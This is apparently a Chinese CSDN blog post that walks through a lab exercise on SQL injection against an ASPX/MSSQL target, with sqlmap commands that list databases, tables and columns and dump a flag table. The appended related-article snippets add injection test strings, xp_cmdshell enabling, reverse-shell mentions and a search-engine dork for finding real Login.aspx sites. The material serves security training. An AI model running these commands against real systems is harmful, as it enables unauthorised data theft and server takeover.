aspx+mssql注入:Sqlmap

最新推荐文章于 2021-10-24 17:35:09 发布
最新推荐文章于 2021-10-24 17:35:09 发布
阅读量573 收藏 2
点赞数
分类专栏: 靶场练习笔记 文章标签: mssql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_56229643/article/details/120794949
版权

靶场地址:http://61.136.208.14:8001/

解题准备:Sqlmap

解题思路:

1、使用工具尝试注入

sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" --dbs --batch

2、库名 

 3、表名

sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" -D dznews --tables --batch

3、字段名

sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" -D dznews -T mssql_flag --columns --batch

 4、获取flag

sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" -D dznews -T mssql_flag -C this_mssql_flag --dump --batch

 

sqlmap基本用法和联合注入
weixin_44098523的博客
02-02 2094
sqlmap基本用法 cookie注入sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的...
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全的SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用。数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
数据库
技术学习
12-03 183
Oracle MySQL DB2 Sybase NoSQL Sqlite MS SQL ACCESS
内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell
zh的博客
10-24 4525
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
sqlmap普通注入mssql注入
边城浪子的博客
09-22 1539
1.判断注入点,获取网站信息 sqlmap.py -u http://www.xx.com/ss.asp?id=123 例: sqlmap.py -u “http://www.xx.com/ss.asp?id=123” 2.获取所有数据库 sqlmap.py -u http://www.xx.com/ss.asp?id=123 –dbs 例: sqlmap.py -u “http:/...
SQLMAP渗透笔记之MSSQL数据库注入
Birdman-one的博客
12-26 4350
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之MSSQL数据库注入                                  ------------------------
Sqlmap基础(二)之Mysql和Mssql注入
weixin_43822735的博客
11-03 584
Mysql数据库的注入 测试注入点:http://bbb.com/view.asp?id=1 sqlmap.py –u “http://aaa.com/view.asp?id=1”测试后发现是mysql数据库。 常用指令:is-dba当前用户是否有权限 dbs 查询所有数据库 current-db 网站当前数据库 users 所有数据库用户 current-user当前数据库用户 第一步:sq...
SQLMAP工具详解
weixin_56218159的博客
06-02 1万+
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
Discuz!NT2.5.0 showuser.aspx注入
wyaspnet的专栏
05-13 2491
Discuz!NT2.5.0 showuser.aspx注入2009-06-17 11:55  从上个星期起就开始入侵检测这个网站了,当时是一点办法都没有,虽说存在一些漏洞,但是都没有太大的利用价值。尝试入侵了一下服务器上的其他站,用的是独立服务器,上面都是主站的一些分站。经检查也都没啥搞头。  因为事情比较多,就把它扔到记事本里放了一个星期。昨天早上起来感觉心
sql注入创建aspx文件方法
如鹿渴慕泉水的专栏
01-26 1638
先开启xpcmdshell前提是sa用户,可以注入时使用 exec sp_configure 'show advanced options',1 ;reconfigure ; go sp_configure 'xp_cmdshell',1 reconfigure  然后运行创建文件 Exec master.dbo.xp_cmdshel
asp aspx 注入练习代码
eldn__的专栏
04-20 1621
ASP:   Dim Db,MyDbPath dim conn '可修改设置一:========================定义数据库类别,1为SQL数据库,0为Access数据库============================= Const IsSqlDataBase =0 MyDbPath = "" '===============
通用aspx防止注入代码
12-06
360通用aspx防护代码 -----------------使用方法------------------------------------------------------------------ 1.将App_Code目录拷贝到web根目录 假如已经存在App_Code目录,那直接把App_Code目录里的360safe.cs文件拷贝到当前的App_Code目录即可。 2.将Global.asax文件拷贝到web根目录 假如已经存在Global.asax文件,那直接把下面这段代码 void Application_BeginRequest(object sender, EventArgs e) { if (Request.Cookies != null) { if (safe_360.CookieData()) { Response.Write("您提交的Cookie数据有恶意字符!"); Response.End(); } } if (Request.UrlReferrer != null) { if (safe_360.referer()) { Response.Write("您提交的Referrer数据有恶意字符!"); Response.End(); } } if (Request.RequestType.ToUpper() == "POST") { if (safe_360.PostData()) { Response.Write("您提交的Post数据有恶意字符!"); Response.End(); } } if (Request.RequestType.ToUpper() == "GET") { if (safe_360.GetData()) { Response.Write("您提交的Get数据有恶意字符!"); Response.End(); } } } 拷贝到当前的Global.asax文件里保存。
SQL注入实战————1、MySQL手工注入实战
热门推荐
Fly_鹏程万里
05-06 1万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL中存在一个参数“MQ==”,从参...
sql注入sqlmap
Zf_008的博客
01-21 300
aspx网站的搜索型注入实战解析
weixin_34037977的博客
06-24 856
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。 我这里看出有上面说的...
aspx+mssql网站注入实战
qq_34341458的博客
02-02 2227
aspx网站注入实战 使用谷歌语法:site:. tw inurl:Login.aspx 查找网站 (site是代表国家的代码) 找到网页使用语句测试是否有注入 可能存在注入,使用burpsuit抓登录时的包。 将数据拷贝保存到d:/a.txt内。 使用sqlmap跑包。 sqlmap.py -r d:/a.txt 发现注入 sqlmap.py -r d:/a.txt --dbs 跑数据库 sqlmap.py -r d:/a.txt -D master --tables 跑表 sqlmap
实验五:ASP+MSSQL的web搭建
weixin_33709590的博客
05-23 479
实验五:ASP+MSSQL的web搭建实验目的:掌握ASP+MSSQL的web的搭建过程 实验环境:一台Server,一台Client 实验的准备过程:1.先搭建一台web网站(在添加删除组件的应用程序服务中的详细信息中找找到IIS,选中并下一步,这样一台WEB服务器就搭建好了。)2.在默认网站的属性里的“主目录”中添加需要访问网页文件的路径,在“文档”中添加index.asp这个文件,在“主目录...
aspx转发php_ASP ASPX PHP 构造注入页面的代码
weixin_29195615的博客
01-14 121
Mssql:hid=request.QueryString(“id”)sql=”select * from admin where id=”&hidset rs=conn.execute (sql)%>Access:db=”aspzhuru.mdb”‘这里修改数据库路径或名称Set conn = Server.CreateObject(“ADODB.Connection”)dbpat...
掌握SQL注入必备:sqlmap-1.1.3工具深度剖析
资源摘要信息:"sql注入扫描器_sqlmap-1.1.3.zip" 知识点详细说明: 1. SQL注入概念 SQL注入(SQL Injection)是一种注入攻击技术,它利用了应用程序中对用户输入处理不当的漏洞,通过在Web表单输入或URL查询字符串...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值